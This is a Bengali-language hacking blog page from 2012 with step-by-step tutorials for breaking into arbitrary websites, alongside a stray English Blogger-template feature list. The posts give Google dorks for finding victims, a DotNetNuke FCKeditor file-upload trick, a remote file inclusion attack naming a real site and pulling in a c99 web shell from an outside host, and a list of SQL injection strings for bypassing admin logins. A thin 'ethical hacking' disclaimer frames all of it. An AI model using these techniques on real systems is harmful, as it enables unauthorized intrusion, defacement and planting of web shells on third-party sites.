Thursday, February 23, 2012
blogger
আমরা তো হ্যাকিং করব! কিভাবে করব? DNN এর মাধ্যমে। কিন্তু আপনারা কি DNN এর পূর্ণরূপ জানেন? DNN এর পূর্ণ রূপ হল DotNetNuke. এখন হয়ত আপনাদের কাছে একটু কঠিন মনে হয়। টিউনে শেষে বলবেন যে, এটা তো এক্কেবারে সহজ। বলতে গেলে SQL-Injection ও Cross Site Scripting এর মতো। আমি আজ দেখাব আপনার টার্গেটের সাই্টটি হ্যাকিং করে ফাইল আপলোড করা। মূলতঃ DotNetNuke হল Microsoft .NET technology এর উপর তৈরি করা বিভিন্ন ওয়েবসাইট প্লাটফরম।
blogger template
What’s New.
- You’ll not only be able to display you tags in a list, but you can display your labels in A Labels Cloud as well.
- You can choose now which labels will be displayed.
- You can customize it using css codes. >> Learn how to do it soon | next tutorial
- It has 5 variations, all labels will be grouped in 5 groups.depending on each label usage in your blog.
- Now you can choose if you want to show number of posts per label or not.
Monday, February 13, 2012
meee
আসসালামু আলাইকুম, সবাইকে আবারও আজকের হ্যাকিংয়ের টিউনে স্বাগতম। কেমন আছেন সবাই? আশা করি সবাই মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আবারও আপনাদের সামনে হাজির হয়েছে আরেকটি হ্যাকিংয়ের টিউন নিয়ে। আজকের পর্বে আপনাদের দেখাব DNN এর মাধ্যমে একটা ওয়েবসাইট হ্যাকিং করা। খুবই মজা হবে তাই না? তাহলে চলূন মূল পর্বে….
আমরা তো হ্যাকিং করব! কিভাবে করব? DNN এর মাধ্যমে। কিন্তু আপনারা কি DNN এর পূর্ণরূপ জানেন? DNN এর পূর্ণ রূপ হল DotNetNuke. এখন হয়ত আপনাদের কাছে একটু কঠিন মনে হয়। টিউনে শেষে বলবেন যে, এটা তো এক্কেবারে সহজ। বলতে গেলে SQL-Injection ও Cross Site Scripting এর মতো। আমি আজ দেখাব আপনার টার্গেটের সাই্টটি হ্যাকিং করে ফাইল আপলোড করা। মূলতঃ DotNetNuke হল Microsoft .NET technology এর উপর তৈরি করা বিভিন্ন ওয়েবসাইট প্লাটফরম।
এই টিউনের কেউ অপব্যবহার করবেন না। এটি শুধু মাত্র শিখার জন্য, কারও ক্ষতি করার উদ্দেশ্যে নয়। কেউ এই টিউনে অপব্যবহার করে কারও ক্ষতি করলে টিজে দায়ী নয়।
হ্যাকিং শুরু
- প্রথমে Google Dorks দিয়ে একটি একটি ওয়েবসাইটকে টার্গেট করব।
inurl:”/portals/0″ site:.com
- এখানে দেখেন কোডটির শেষে .com দেয়া আছে। আপনি ইচ্ছা করলে আপনার ইচ্ছা মতো ডোমেইন ব্যবহার করতে পারবেন। যেমন- bd, ph, ae, net, org ইত্যাদি
- এবার কোডটি Google এ সার্চ দিন।
- তাহলে আপনাকে সার্চ রেজাল্টে অনেকগুলো ওয়েবসাইটের ফলাফল দিবে।
- এবার এখান থেকে একটিকে টার্গেট করুন। মানে একটির উপর ক্লিক করুন।
- মনে করি আপনি এই সাই্টটিকে টার্গেট করলেন www.victim.com
- এখন আমরা এই সাইটটির vulnerability পরীক্ষা করব।
- এজন্য নিচের কোডটি সাইট লিংকের পরে বসিয়ে এন্টার দিন।
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
- লিংকের পরে বসালে হবে
www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
- এবার যদি নিচের ছবির মতো আসে, তাহলে বুঝবেন যে এটিকে হ্যাকিং করা যাবে।
- এবার এখান থেকে শেষের অপশানটি নির্বাচন করুন “A File On Your Site”
- এবার নিচের কোডটি লিংকের ঘরে লিখুন।
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
- যদি আপনি সব কিছু পারেন, তাহলে আপনি এই সাইটে .swf .jpg .gif .pdf ফাই্ল আপলোড করতে পারবেন।
- আপনি আপনার ফাই্ল আপলোড করার পর আপনার ফাইলের লিংক পাবেন এই রকম
www.victim.com/portals/0/yourfile.extension
- মনে করুন আপনি b.txtফাইল আপলোড করেছেন, তাহলে হবে এই রকম।
www.victim.com/portals/0/b.txt
- তাহলে হবে এই রকম
- হা হা হা হা হা হা হা হা। কেমন লাগল? আশা করি এখন আপনি নিজে নিজেই পারবেন।
এখন আপনারা প্রশ্ন করতে পারবেন যে, যদি আমি নির্দিষ্ট সাই্ট হ্যাকিং করতে চাই, তাহলে কি করব?
উত্তর হবে, এটা হল Ethical Hacking টিউটোরিয়াল। এটা Black Hat হ্যাকিং টিউটোরিয়াল নয়। তাই্ আমি এভাবেই দিলাম।
সবাই্ ভাল থাকবেন, ধন্যবাদ। আল্লাহ হাফেজ……..
Sunday, February 12, 2012
meeeeeeeeeeeee
হ্যাকার ফোরাম :
আপনি একজন হ্যাকার হতে হলে প্রথমে আপনাকে বিভিন্ন ইথিকাল হ্যাকার যারা মূলত ইলিট (এ ব্যাপারে আগের অধ্যায়ে বলা হয়েছে) তাদের থেকে গুরুত্বপূর্ণ টিপসগুলো শিখে নিতে হবে। আর বিভিন্ন ধরনের টিপস নিয়ে আলোচনা হয় ফোরামে। নিচে হ্যাকারদের জন্য কয়েকটি গুরুত্বপূর্ণ ফোরামের লিংক প্রদান করা হল। ফোরামগুলোতে যোগদিন এবং নিয়মিত পোষ্টগুলো পড়ুন। কোন বিষয় জানতে চাইলে সেখানেই সাহায্য চাইতে পারেন।
- www.hackerthreads.org
- www.hackforums.net
- www.hacker.org/forum
- www.crackhackforum.com
হ্যাকিং রিসোর্স :
![piratedisk হ্যাকিং লার্নিং :: হ্যাকার কারা? হ্যাকারদের জন্য ফোরাম, রিসোর্স ও মুভি [অধ্যায় ২] | Techtunes](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sw4I3dNb7Ujr5sovYcfgjPfebV-auC3_MTmzKjY2GDsz37dB6hL8YXLFbIwzQjGm2wMyxGMpDRmzLFGDxpNUGHc_9GRCoajYYDKKx9yQdmD3Q=s0-d)
হ্যাকিং করতে হলে বিভিন্ন সফটওয়্যার প্রয়োজন হয়, প্রয়োজন হয় কোড, স্ক্রিপ্ট, ডর্ক ইত্যাদির। নিচে কিছু লিংক দেয়া হল যেখান থেকে আপনি অনেক মূল্যবান হ্যাকিং রিসোর্স পেতে পারেন যা আপনাকে হ্যাকার হতে সাহায্য করবে।
- http://www.ethicalhacker.net
- http://insecure.org
- http://hacker.resourcez.com
- http://www.certifiedethicalhacker.com
- http://www.elitehack.net
- http://www.elite-hackers.com
- http://www.exploit-db.com
- http://www.1337day.com
- http://www.breakthesecurity.com
- http://www.thehackerslibrary.com
- http://www.port7alliance.com
- http://www.hackers.nl
- http://hackmein.tripod.com
- http://kyrionhackingtutorials.com
- http://www.hacking-gurus.net
- http://hackmyass.wordpress.com
- http://www.borntohack.in
- http://www.criticalsecurity.net
- http://www.mpgh.net
- http://www.duniapassword.com
- http://www.progamercity.net
meeeeeeeeeeeeeeeeeee
আজ দেখাব Remote file inclusion হ্যাকিং। ওহ! আপনারা হয়ত জানেন না যে, হ্যাকিং করার থেকে হ্যাকিং নিয়ে পোষ্ট লেখা আরও কঠিন ও কষ্টকর। যদি পোষ্ট করতেন তাহলে বুঝতেন। থাক পোষ্ট করা লাগবে না, শুধু মন্তব্য করলেই হবে। মন্তব্য করলে পোষ্টের টিজেরা উৎসাহিত হয়। এতে তাদের লেখার গতি ও স্বাচন্দ্যও বাড়ে। তাহলে আর কথা নয় এবার শুরু হয়ে যাক পোষ্টটি…..
Remote file inclusion হ্যাকিং, একে সংক্ষেপে বলে RFI হ্যাকিং। এটি অনন্যা হ্যাকিং ম্যাথডের মধ্যে এটিও একটি অন্যতম জনপ্রিয় ম্যাথড। অন্যন্যা পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এই vulnerability এর মাধ্যমে একজন হ্যাকার একটি ওয়েব সার্ভারের remote file যুক্ত করতে পারে। আশা করি RFI হ্যাকিং সম্পর্কে মোটামুটি ধারণা পেয়েছেন।
—————————————————————————————————————————————————— কোন সাইটটি vulnerable ? কিভাবে বুঝবেন? খুবই কঠিন প্রশ্ন, তাই না? এই প্রশ্নের উত্তর জানার জন্য নিচের লিংকটি দেখেন….http://www.targetsite.com/index.php?page=Anythingউপরের লিংকের মতোই দেখতে পাবেন, যেগুলো আপনি খুঁজচ্ছেন তন্ন তন্ন করে। এখন এগুলো বাহির করবেন কিভাবে? গুগল ডক দরকার ? নিন নিচে গুগল ডক দিলাম।
“inurl:index.php?page=”উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো ওয়েবসাইট গুগল আপনার সামনে এনে হাজির করবে। এখন কোন ওয়েবসাইটটি আজকের ম্যাথডের জন্য vulnerable তা পরীক্ষা করে দেখতে হবে। কিভাবে করবেন ? নিচের মতো করে করুন।
http://www.targetsite.com/index.php?page=www.google.com
এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….
http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.comতাহলে এটি দেখাবে…
এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…
এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে, যাতে তার কাজটি সবাইকে দেখাতে । মানে প্রমাণটি। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে। আমি আপনাদের দেখাব c99 shell আপলোড করা। এজন্য হ্যাকাররা যে কোন একটি ওয়েবহোষ্টটিং সাইটে তাদের সেল আপলোড করে নেয়। যেমন- ripway.com, 110mb.com ইত্যাদি। এখন মনে করেন আমি ripway.com এই সাইটে সেল আপলোড করলাম। তাহলে আমার লিংক হবে…
http://h1.ripway.com/tjunselected/c99shell.php?এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে। কমান্ডটি হবে
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?
এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?
তবে অবশ্যই মনে রাখবেন লিংকের শেষে “ ? ” প্রশ্নবোধক চিহ্নটি লাগিয়ে দিবেন। নতুবা আপনার শেল কাজ করবে না।
meeeeeeeeeeeeeeeeeeeeeeee
শিরোনাম দেখেই আশা করি বুঝে গেছেন পোষ্টটি কি নিয়ে ? জ্বী, ঠিকই ধরেছেন। আজ দেখাব মাত্র ৫ মিনিটে কিভাবে একটি ওয়েবসাইট বস্কাইয়া (হ্যাকিং) দিতে হয়। খুবই মজা হবে। আমার মনে হয় উৎসুক জনতা এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে। পোষ্ট তো করেই যাচ্ছি কিন্তু মন্তব্যই পাই না। দেখা যায় যে একটা পোষ্ট করার কিছুক্ষণ পর দেখা যায় ৩০০-৪০০ জন ভিজিটর পড়ে ফেলেছে। কিন্তু ঐ সময় দেখা যায় মন্তব্য এসেছে ১, ২ বা ৫টা। এই ভাবে চললে লিখতে কার ভাল লাগে। আপনাদের তো আর বলি না লিখতে পোষ্টটি পড়ে সব শিখ ফেলেছেন কিন্তু এরপর কাজটাও সেরে ফেলেছেন। কিন্তু কিন্তু একটা মন্তব্য করার মতো আর সময় পেলেন না। এই জন্যই আমরা বাঙ্গলী। যাক চলুন পোষ্টে……….। শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
- প্রথমে আমরা যাব www.google.com এ।
- এবার Search বক্সে যে কোন একটি Google dork লিখুন।
- আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp""inurl: admin.php" "inurl: login/admin.php" "inurl: admin/login.php" "inurl: adminlogin.php" "inurl: adminhome.php" "inurl: admin_login.php" "inurl: administratorlogin.php" "inurl: login/administrator.php" "inurl: administrator_login.php"- এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
- যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel username : password :- এখানে ইউজার নেম দিনঃ “Admin”
- তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই
- নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
' or '1'='1' or 'x'='x' or 0=0 --" or 0=0 --or 0=0 --' or 0=0 #" or 0=0 #or 0=0 #' or 'x'='x" or "x"="x') or ('x'='x' or 1=1--" or 1=1--or 1=1-- ' or a=a--" or "a"="a') or ('a'='a") or ("a"="ahi" or "a"="ahi" or 1=1 --hi' or 1=1 --'or'1=1' - তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin password:'or'1'='1- এবার submit এ ক্লিক করুন।
- ব্যস কাজ শেষ আপনি এখন রাজা যদি ছেলে হন আর মেয়ে হলে রাণী
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
হ্যাকিং শুধু মাত্র শিখার জন্য। এটির কষ্ট করে অপব্যবহার করবেন না। এই পোষ্টের অপব্যবহারে কেউ ক্ষতি গ্রস্থ হলে টিজে এর জন্য দায়ী নয়।
সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকুন ও ভাল রাখুন আপনার পাশের লোকটিকে। আল্লাহ হাফেজ………
Subscribe to:
Posts (Atom)